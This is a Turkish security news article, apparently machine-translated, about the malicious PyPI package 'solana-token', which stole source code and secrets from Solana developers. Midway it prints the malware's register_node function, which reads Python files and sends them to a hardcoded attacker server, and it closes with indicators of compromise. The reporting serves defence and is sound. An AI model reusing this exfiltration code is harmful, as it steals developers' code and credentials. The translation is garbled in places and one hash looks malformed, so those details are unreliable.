Yeni keşfedilen kötü niyetli bir python paketi, Solana-TokenSolana blockchain uygulamaları üzerinde çalışan geliştiricilerin kaynak kodunu ve hassas sırlarını çalmak için silahlandırılmıştır.
Python Paket Dizini’ne (PYPI) yüklenen modül, Solana tabanlı projeler için meşru bir yardımcı program olarak görüldü, ancak kritik verileri uzak bir sunucuya yaymak için tasarlanmış kodlu kod.
ReversingLabs araştırmacıları tehdidi Mayıs 2025’te hızlı yayılmasına dikkat çekti: paket kaldırılmadan önce 600 kattan fazla indirildi.
.png
)
Kötü amaçlı yazılım, özellikle açık kaynaklı depolara olan güvenden yararlanarak geliştiricileri hedefler. Saldırı vektörü, sosyal mühendisliğe bağlı, Solana ekosisteminin kurbanları cezbetmek için popülaritesinden yararlanıyor.
Yüklendikten sonra, paket Python dosyaları için sistemi tarayan, içeriğini çıkaran ve çalınan verileri sabit kodlu bir IP adresine gönderen bir komut dosyası yürütür (84.54.44.100:3000).
Muhtemelen tehdit aktörleri tarafından kontrol edilen bu sunucu, kimlik bilgisi hırsızlığı veya altyapı uzlaşması da dahil olmak üzere daha fazla saldırı sağlayabilir.
ReversingLabs analistleri, paketin kaynak kodu eksfiltrasyonuna benzersiz odağını vurguladı-tipik Infostealer kampanyalarında daha az yaygın olan taktik.
Geliştiricilerin korunmasız sırlarını (örn. API anahtarları, cüzdan kimlik bilgileri) hasat ederek, saldırganlar kripto para birimi projelerinde bir dayanak kazanırlar ve hem bireysel geliştiriciler hem de merkezi olmayan platformlar için risk oluştururlar.
Kampanya daha geniş bir eğilimle uyumludur: 23 kötü niyetli kripto odaklı tedarik zinciri saldırıları, RL’nin 2025 yazılım tedarik zinciri güvenlik raporuna göre sadece 2024’te belgelenmiştir.
Enfeksiyon mekanizması ve kod analizi
Kötü amaçlı yazılım yükü, Register_Node adlı bir işlevin içine yerleştirilmiştir. Çağırıldığında, bu işlev, belirli kütüphanelerle ilgisi olmayan .py dosyalarını tanımlayarak Python yürütme yığınından yinelenir (Priess.Py, Importlib).
Daha sonra her dosyanın içeriğini okur ve saldırganın sunucusuna HTTP Post istekleri aracılığıyla iletir:-
python def register_node(base_url, node_url): data = {'node_url': node_url} url = f"{base_url}/nodes/register" stack = inspect. Stack() for frame in stack: filename = frame. Filename if filename.endswith(".py") and "prices.py" not in filename and "importlib" not in filename: try: with open(filename, 'r', encoding='utf-8') as f: content = f.read() send_post_request("http://84.54.44.100:3000/nodes/register", {"p": str(content)}) except Exception as e: pass break return send_post_request(url, data)
Bu yaklaşım, sabit kodlanmış kimlik bilgileri içerenler de dahil olmak üzere proje dosyalarının geniş bir şekilde yakalanmasını sağlar.
Özellikle, saldırganlar benzer aktivite için kaldırılan 2024 PYPI paketinden Solana-Token adını yeniden kullandılar. Pypi’nin politikaları, yazarların bir pakete girmedikleri ve isim süzülme fırsatları yaratmayan yeniden yayınlanmasına izin verir.
ReversingLabs paketi Pypi’ye bildirdi ve kaldırılmasını istedi. Bununla birlikte, olay açık kaynaklı ekosistemlerdeki sistemik güvenlik açıklarını tasvir etmektedir.
Geliştiricilere bağımlılıkları denetlemeleri, şüpheli ağ etkinliğini izlemeleri ve gizlenmiş tehditleri tespit etmek için statik kod analizi gibi araçları benimsemeleri istenir.
Tedarik zinciri saldırıları geliştikçe, proaktif savunma hassas kod ve altyapıyı korumak için kritik öneme sahiptir.
Uzlaşma Göstergeleri (IOCS)
- Paket:
solana-token(V0.0.1, v0.0.2) - SHA1 Hashes:
f4e1149360174b4fcf0dcc6e61898c81803–e07457e36bf9aab1dc2b54acd30ec8f9e5c - C2 Sunucusu:
84.54.44.100:3000
How SOC Teams Save Time and Effort with ANY.RUN - Live webinar for SOC teams and managers